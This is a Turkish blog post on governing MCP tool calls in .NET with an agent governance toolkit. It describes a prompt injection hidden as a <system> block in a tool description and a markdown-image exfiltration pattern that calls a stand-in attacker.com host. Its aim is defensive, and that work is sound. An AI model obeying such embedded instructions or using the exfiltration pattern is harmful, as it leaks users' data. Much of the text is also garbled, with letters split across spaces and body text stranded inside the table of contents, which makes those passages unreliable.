İçeriğe atla
Şimdi yükleniyor
AKAşkın KILIÇ
  • Anasayfa
  • Azure & Bulut
    • Microsoft Azure
    • Bulut Altyapı
    • Microsoft 365
  • Yazılım
    • DevOps
    • Geliştirici Araçları
    • Konteyner & K8s
  • AI & Veri
    • Yapay Zeka
    • Veri & Analitik
  • Güvenlik
    • Güvenlik & Kimlik
    • Kurumsal Teknoloji
  • Hakkımda
    • İletişim
×
  • Azure
  • Bulut Altyapı
  • DevOps
  • Geliştirici Araçları
  • Güvenlik & Kimlik
  • Konteyner & Kubernetes
  • Kurumsal Teknoloji
  • Microsoft 365
  • Microsoft Azure
  • Veri & Analitik
  • Yapay Zeka
  • Başlangıç
  • Yapay Zeka
  • MCP Tool Çağrılarını .NET’te Yönetmek: AGT ile Pratik Yol
Bulut Altyapı Geliştirici Araçları Yapay Zeka .NET 8, agent governance, AGT, güvenlik, MCP, prompt enjeksiyonu, tool çağrıları, YamlDotNet Aşkın KILIÇ 06/05/2026 2 Yorumlar

MCP Tool Çağrılarını .NET’te Yönetmek: AGT ile Pratik Yol

MCP Tool Çağrılarını .NET'te Yönetmek: AGT ile Pratik Yol
⏱️ 8 dk okuma📅 6 Mayıs 2026🔄 Güncelleme: 15 Temmuz 2026

Geçen ay bir bankacılık müşterisinde garip bir şey yaşadık. Geliştiriciler, iç sistemlere bağlanan bir AI agent yazmıştı. Demo da fena görünmüyordu… ta ki biri MCP üzerinden eklenen “yardımcı” bir tool’un açıklamasına saklanmış prompt enjeksiyonunu fark edene kadar. Tool adı masumdu. Açıklamanın içinde küçük bir <system> bloğu vardı ve LLM bunu resmen talimat gibi okuyordu.

📋 İçindekiler

  1. The sanitizer şu pattern’leri yakalıyor:

    • Dahili prompt injection blokları (<system>, <instructions> vb.) (bu kritik)
    • Kredi bilgisi sızıntıları — AWS keys, GitHub tokens, connection string’ler — bunu es geçmeyin
    • Dışarı veri taşıma URL pattern’leri (özellikle markdown image hack’leri: ![](https://attacker.com?data=...))
    • Kodlanmış payload’lar için Base64 kalıntıları

    Daha geçen yılın sonunda bir e-ticaret müşterisinde gördüğümüz vaka tam buydu: agent ürün açıklaması çekiyordu ve açıklamalardan birinde markdown image olarak gizlenmiş exfiltration URL’si vardı. Model bunu render etmek isteyince işler çirkinleşebilirdi; neyse ki kontrol katmanımız vardı da kazaya dönmedi. AGT olsaydı açık konuşayım daha az kod yazardık.

    GovernanceKernel: Hepsini Bağlayan Tutkal

    Aslında — hayır dur, daha doğrusu, GovernanceKernel, yukarıdaki bileşenleri tek bir DI container’a register eden ve OpenTelemetry ile audit event’lerini publish eden ana sınıf gibi çalışıyor diyelim. Bunu Application Insights veya Azure Monitör’a bağlamak çok rahat oluyor.

    Bir de KVKK boyutu var.T ool dönüşünde TC kimlik numarası,I BAN,t elefon gibi alanlar geçiyorsa,bunların maskelenmesi lazım.A GT’nın sanitizer’ı default olarak bu pattern’leri tanımıyor — Türkçe/Türkiye spesifik regex’ler eklemek gerekiyor.B en kendi TurkishPiiPatterns sınıfımı yazdım,paylaşmaya da niyetim var ileride.

    Startup mı,E nterprise mı?

    Küçük bir ekipseniz ve hızlı POC çıkarıyorsanız,A GT’nın tamamını kullanmak overkill olabilir.McpSecurityScannerveMcpResponseSanitizerile başlayın,sadece bunlar bile saldırı yüzeyini ciddi azaltır.T am policy engine’e geçmek zaman alır.

    Enterprise tarafındaysanız tablo farklı.G overnanceKernel ‘i ortak bir paket olarak iç NuGet feed’inize koyun,büyük çoğunluk agent ekiplerinizin kullanmasını zorunlu tutun.A2A v1 ile.NET’te Çapraz Platform Agent İletişimi
    ile birlikte kullanırsanız,a gent-to-agent iletişimde de aynı politika katmanı geçerli olur.

    P ratik Başlangıç Rehberi

    Tamam,p eki nereden başlayacağız?B enim önerim şu sırayla:

    1. d otnet add package Microsoft.AgentGovernance
      ile paketi ekleyin — test projesinde,p roduction’da değil önce.
    2. E mevcut MCP sunucularınızın tool tanımlarını
      M cpSecurityScanner

      ‘dan geçirin.R isk score’l ara bakın,şaşıracaksınız.
      (bence en önemlisi)
    3. E n riskli tool ‘lar için(delete,s end,t ransfer içerenler)Y AML policy yazın,m anual onay zorunlu kılın.
      (bu kritik)
    4. S anitizer ‘ı L LM’e dönüş yolu üzerine koyun.B urada false positive olabilir,b ir hafta gözlemleyin.

    I lk haftada bir hayal kırıklığım öldü açıkçası:d ökümantasyon hâlâ ham,b azı edge case ‘ler için kod okumak gerekiyor.B u konuda
    GPT-5.5 ve Microsoft Foundry : Kurumsal AI Artık Ciddi
    yazısında bahsettiğim Foundry tarafının tersine,A GT henüz “şirket içi sample”lar seviyesinde.A ma yön doğru.B iraz daha pişmesi lazım.

    Sıkça Sorulan Sorular

    AGT, MCP olmadan da çalışır mı?

    Ne yalan söyleyeyim, Şu anki sürümde asıl odak MCP üzerine. Ama hani GovernanceKernel ve policy engine aslında oldukça generic — yanı kendi tool çağrı sisteminizi yazıyorsanız, custom adapter ile bağlamak mümkün. Açıkçası dökümantasyon bu senaryo için henüz biraz zayıf kalıyor.

    Performansa etkisi var mı?

    Benim ölçümlerimde gateway pipeline’ı, tool çağrısı başına ortalama 8-15 ms ekliyor. Sanitizer işe dönüş boyutuna göre değişiyor — mesela 10 KB JSON için 5 ms civarında. Production’da pek fark edilmiyor, ama yüksek frekanslı agent’larda batching’i düşünmek gerekebilir bence.

    YAML politikalarını GitOps ile yönetebilir mıyım?

    Şöyle söyleyeyim, Evet, hatta önerilen yol da zaten bu. Politika dosyalarını ayrı bir repo’da tutun, agent uygulamasına config olarak inject edin. Değişiklikler PR ile gelsin, code review yapılsın. Bu şekilde compliance ekibi de sürece dahil olabiliyor — tecrübeme göre bu kısmı es geçmeyin.

    Durun, bir saniye.

    AGT açık kaynak mı, ücretsiz mi?

    Şu an MIT lisanslı ve ücretsiz. Bence Microsoft’un agent ekosistemini büyütmek için attığı stratejik bir adım bu. Hani ne farkı var diyorsunuz, değil mi? İleride premium özellikler gelir mi, açıkçası bilinmez — ama core kütüphanenin MIT olarak kalacağı anlaşılıyor.

    Hangi.NET sürümleri destekleniyor?

    .NET 8.0 ve üzeri çalışıyor..NET Framework ya da.NET 6 desteği yok maalesef. Eğer eski bir uygulamadaysanız, agent katmanını ayrı bir.NET 8 servis olarak ayırmak en pratik çözüm bence.

    Kaynaklar ve İleri Okuma

    Governing MCP tool calls in.NET with the Agent Governance Toolkit (Microsoft DevBlogs)

    Model Context Protocol Resmî Spesifikasyonu

    Doğrusu, Microsoft Learn:.NET için AI Geliştirme Dokümantasyonu

    Model Context Protocol GitHub Organizasyonu

    🤖Bu yazı yapay zeka (büyük dil modelleri) ile hazırlanmış, insan editör tarafından incelenmiştir. İçerik üretim sürecimiz.
    Aşkın KILIÇ
    Aşkın KILIÇYazar

    20+ yıl deneyimli Azure Solutions Architect. Microsoft sertifikalı bulut mimari ve DevOps danışmanı. Azure, yapay zekâ ve bulut teknolojileri üzerine Türkçe teknik içerikler üretiyor.

    AZ-305AZ-104AZ-500AZ-400DP-203AI-102

    İlgili Yazılar

    GitHub Bildirim Saklama Süresi Kısalıyor: Ne Yapmalı?
    GitHub Bildirim Saklama Süresi Kısalıyor: Ne Yapmalı?25 Nis 2026
    ABD Devletine Gizli Bulut: Azure Confidential Computing ile Yeni Dönem
    ABD Devletine Gizli Bulut: Azure Confidential Computing ile Yeni Dönem22 Mar 2026
    Pure Virtual C++ 2026 Geliyor: Takvime Not Düşme Vakti
    Pure Virtual C++ 2026 Geliyor: Takvime Not Düşme Vakti26 Haz 2026
    .NET 11 Preview 5: Sessiz Gelen Yenilikler, Büyük Etki
    .NET 11 Preview 5: Sessiz Gelen Yenilikler, Büyük Etki10 Haz 2026

    Bu içerik işinize yaradı mı?

    Benzer içerikleri kaçırmamak için YouTube ve GitHub hesaplarımı takip edin.

    YouTube GitHub

    Haftalık Bülten

    Her pazar özenle seçilmiş teknoloji yazıları doğrudan e-postanıza gelsin.

Etiket .NET 8 agent governance AGT güvenlik MCP prompt enjeksiyonu tool çağrıları YamlDotNet
Önceki yazı

GPT-5.2 ve GPT-5.2-Codex Emekli Oluyor: Şimdi Ne Olacak?

Sonraki yazı

Visual Studio’da Bulut Ajanları: Kod Akışını Değiştiren Güncelleme

İlginizi Çekebilir

Customize the reasoning level for Copilot cloud agent
Aşkın KILIÇ 0

Customize the reasoning level for Copilot cloud agent

04/08/2026
Gateway API v1.6: TCPRoute ve UDPRoute Standard Oldu
Aşkın KILIÇ 0

Gateway API v1.6: TCPRoute ve UDPRoute Standard Oldu

04/08/2026
Disrupting supply chain attacks on npm and GitHub Actions
Aşkın KILIÇ 0

Disrupting supply chain attacks on npm and GitHub Actions

03/08/2026

2 comments

comments user
Gökhan İ. 06/05/2026 12:39

Prompt enjeksiyonu meselesini çoğu zaman model seviyesinde düşünüyoruz ama governance katmanının ne kadar kritik olduğunu bu yazı güzel özetlemiş. AGT’yi daha önce duymamıştım, .NET tarafında deneyen var mı acaba? Bu arada kontrolü kaybetmeme konusuna ilginiz varsa şu yazı da benzer bir perspektif sunuyor: https://www.askinkilic.com.tr/microsoft-sovereign-private-cloud-azure-local-ile-olcek-buyu/

comments user
Tuğçe R. 06/05/2026 18:18

MCP güvenliği konusunda Türkçe kaynak bulmak gerçekten zordu, tam ihtiyacım olan yazıydı. Prompt enjeksiyonunu governance katmanıyla ele almanız özellikle dikkat çekici, bunu production ortamında denemek istiyorum. AGT’yi daha önce duymamıştım, biraz daha araştıracağım.

Yorumlar kapalı.

Yazı Ara

Takip Edin

  • Takipçi
  • Takipçi
  • Takipçi
  • Abone
  • Takipçi
  • Customize the reasoning level for Copilot cloud agent
    04/08/2026 Customize the reasoning level for Copilot cloud agent
  • Gateway API v1.6: TCPRoute ve UDPRoute Standard Oldu
    04/08/2026 Gateway API v1.6: TCPRoute ve UDPRoute Standard Oldu
  • Disrupting supply chain attacks on npm and GitHub Actions
    03/08/2026 Disrupting supply chain attacks on npm and GitHub Actions
  • VS Code Temmuz 2026: Copilot Ajanları ve Çoklu Sohbet
    03/08/2026 VS Code Temmuz 2026: Copilot Ajanları ve Çoklu Sohbet
  • Visual Studio'da GitHub Copilot: Temmuz 2026 Güncellemesi
    03/08/2026 Visual Studio’da GitHub Copilot: Temmuz 2026 Güncellemesi
  • Copilot Cloud Agent Metriği: Kullanımı Ölçmek Kolaylaştı
    11/04/2026 Copilot Cloud Agent Metriği: Kullanımı Ölçmek Kolaylaştı
  • Azure MCP Server 2.0: Kendi Sunucunuzda Ajan Otomasyonu
    10/04/2026 Azure MCP Server 2.0: Kendi Sunucunuzda Ajan Otomasyonu
  • GitHub Copilot Cloud Agent İçin Runner Kontrolü: Kurumsal Düzen
    03/04/2026 GitHub Copilot Cloud Agent İçin Runner Kontrolü: Kurumsal Düzen
  • MCP Apps’i Kolaylaştıran Fluent API: Sahada Ne Değişiyor?
    08/04/2026 MCP Apps’i Kolaylaştıran Fluent API: Sahada Ne Değişiyor?
  • GitHub Code Scanning’de Toplu Düzeltme: PR’lar Hızlandı
    07/04/2026 GitHub Code Scanning’de Toplu Düzeltme: PR’lar Hızlandı
  • GitHub Copilot Pro Denemeleri Neden Durdu?
    11/04/2026 GitHub Copilot Pro Denemeleri Neden Durduruldu?
  • vcpkg'de Paralel Kurulum ve Güvenlik Yaması: Neler Değişti?
    06/04/2026 vcpkg’de Paralel Kurulum ve Güvenlik Yaması: Neler Değişti?
  • MCP Apps’i Kolaylaştıran Fluent API: Sahada Ne Değişiyor?
    08/04/2026 MCP Apps’i Kolaylaştıran Fluent API: Sahada Ne Değişiyor?
  • Yapay Zekâ Çağında Sanayi Politikası: Asıl Mesela Ne?
    06/04/2026 Yapay Zekâ Çağında Sanayi Politikası: Asıl Mesela Ne?
  • Microsoft Foundry Mart 2026: Sahadan İlk İzlenimler
    10/04/2026 Microsoft Foundry Mart 2026: Sahadan İlk İzlenimler

SİZİN İÇİN DERLEDİK

Customize the reasoning level for Copilot cloud agent
Bulut Altyapı Yapay Zeka

Customize the reasoning level for Copilot cloud agent

04/08/2026 Aşkın KILIÇ
Gateway API v1.6: TCPRoute ve UDPRoute Standard Oldu
Bulut Altyapı Geliştirici Araçları

Gateway API v1.6: TCPRoute ve UDPRoute Standard Oldu

04/08/2026 Aşkın KILIÇ
Disrupting supply chain attacks on npm and GitHub Actions
Bulut Altyapı DevOps Güvenlik & Kimlik

Disrupting supply chain attacks on npm and GitHub Actions

03/08/2026 Aşkın KILIÇ
VS Code Temmuz 2026: Copilot Ajanları ve Çoklu Sohbet
Geliştirici Araçları Güvenlik & Kimlik Microsoft Azure Yapay Zeka

VS Code Temmuz 2026: Copilot Ajanları ve Çoklu Sohbet

03/08/2026 Aşkın KILIÇ
Visual Studio'da GitHub Copilot: Temmuz 2026 Güncellemesi
Geliştirici Araçları Microsoft Azure Yapay Zeka

Visual Studio’da GitHub Copilot: Temmuz 2026 Güncellemesi

03/08/2026 Aşkın KILIÇ
SQL MCP Server ile Kullanıcı Kimliğini Koruyan Denetim
Bulut Altyapı Güvenlik & Kimlik Veri & Analitik

SQL MCP Server ile Kullanıcı Kimliğini Koruyan Denetim

03/08/2026 Aşkın KILIÇ
az webapp deploy'da Zenginleştirilmiş Hata Çıktıları
Bulut Altyapı Geliştirici Araçları Microsoft Azure

az webapp deploy’da Zenginleştirilmiş Hata Çıktıları

03/08/2026 Aşkın KILIÇ
GitHub Stacked Pull Requests Public Preview'da
Geliştirici Araçları Kurumsal Teknoloji

GitHub Stacked Pull Requests Public Preview’da

02/08/2026 Aşkın KILIÇ
GitHub Copilot App'te Stacked Sessions ve Stacked PR'lar
Bulut Altyapı Geliştirici Araçları Yapay Zeka

GitHub Copilot App’te Stacked Sessions ve Stacked PR’lar

02/08/2026 Aşkın KILIÇ
controller-runtime Cache Nasıl Çalışır?
DevOps Geliştirici Araçları

controller-runtime Cache Nasıl Çalışır?

02/08/2026 Aşkın KILIÇ
Microsoft Veritabanları: Güvenilirlikten AI Hazırlığına
Güvenlik & Kimlik Microsoft Azure Veri & Analitik

Microsoft Veritabanları: Güvenilirlikten AI Hazırlığına

02/08/2026 Aşkın KILIÇ
GitHub Casefold: Kaynak Kodda Bellek Hızında Katlama
DevOps Geliştirici Araçları

GitHub Casefold: Kaynak Kodda Bellek Hızında Katlama

01/08/2026 Aşkın KILIÇ

Hakkımda

Aşkın KILIÇ

Microsoft Azure Çözüm Uzmanı. Bulut bilişim, yapay zekâ, DevOps ve kurumsal güvenlik üzerine yazılar yazıyorum.

Devamını Oku →

Kategoriler

  • Azure
  • Bulut Altyapı
  • DevOps
  • Geliştirici Araçları
  • Güvenlik & Kimlik
  • Konteyner & Kubernetes
  • Kurumsal Teknoloji
  • Microsoft 365
  • Microsoft Azure
  • Veri & Analitik
  • Yapay Zeka

Popüler Etiketler

AI ajanları Azure azure app service Azure Cosmos DB Azure Developer CLI Azure DevOps Azure Functions Azure OpenAI azure sdk Azure SQL bulut bilişim C++ CI/CD copilot Copilot CLI DevOps DevSecOps geliştirici verimliliği GitHub GitHub Actions GitHub Copilot güvenlik Kimlik Doğrulama Kubernetes Kurumsal geliştirme kurumsal güvenlik kurumsal yapay zeka maliyet optimizasyonu Microsoft Agent Framework Microsoft Azure Microsoft Foundry MSVC otomasyon performans Pull Request Python RAG SEO uyumlu verimlilik veri yönetimi Visual Studio VS Code yapay zeka yapay zeka ajanları Yazılım geliştirme
  • Gizlilik Politikası
  • Çerez Politikası
  • Kullanım Koşulları
  • Hakkımda
  • İletişim

© 2026 Aşkın KILIÇ | Tüm hakları saklıdır. | Powered By SpiceThemes

Çerez tercihleri Zorunlu çerezler sitenin çalışması için kullanılır. Analitik çerezler yalnız açık izninizden sonra Google Analytics ve Microsoft Clarity için etkinleştirilir. KVKK ve Çerez Politikası
✉

Haftalık Bülten

Azure, DevOps ve Yapay Zeka dünyasındaki en güncel içerikleri her hafta doğrudan e-postanıza alın.

Spam yok. İstediğiniz zaman iptal edebilirsiniz.
📱
Uygulamayı Yükle Ana ekrana ekle, çevrimdışı oku
Ana Sayfa
Kategoriler
💻 Geliştirici Araçları 339 yazı 🏗️ Bulut Altyapı 280 yazı 🤖 Yapay Zeka 240 yazı 🔧 DevOps 198 yazı ☁️ Microsoft Azure 186 yazı 🔒 Güvenlik & Kimlik 161 yazı 🏢 Kurumsal Teknoloji 65 yazı 📊 Veri & Analitik 57 yazı 🐳 Konteyner & Kubernetes 47 yazı 📧 Microsoft 365 21 yazı 📁 Azure 1 yazı
Ara
Popüler
Yapay Zeka Azure Kubernetes DevOps Copilot Docker
Paylaş
WhatsApp
İçindekiler
    ← GPT-5.2 ve GPT-5.2-Codex Emekl...
    Visual Studio’da Bulut Ajanlar... →
    📩

    Gitmeden önce!

    Her pazar özenle seçilmiş teknoloji yazıları ve AI haberleri doğrudan e-postanıza gelsin. Ücretsiz, spam yok.

    🔒 Bilgileriniz güvende. İstediğiniz zaman ayrılabilirsiniz.

    📬 Haftalık bülten: Teknoloji + AI haberleri
    Beni Takip Et Yeni Azure / AI / DevOps yazılarını GitHub ve RSS üzerinden takip edin.
    GitHub RSS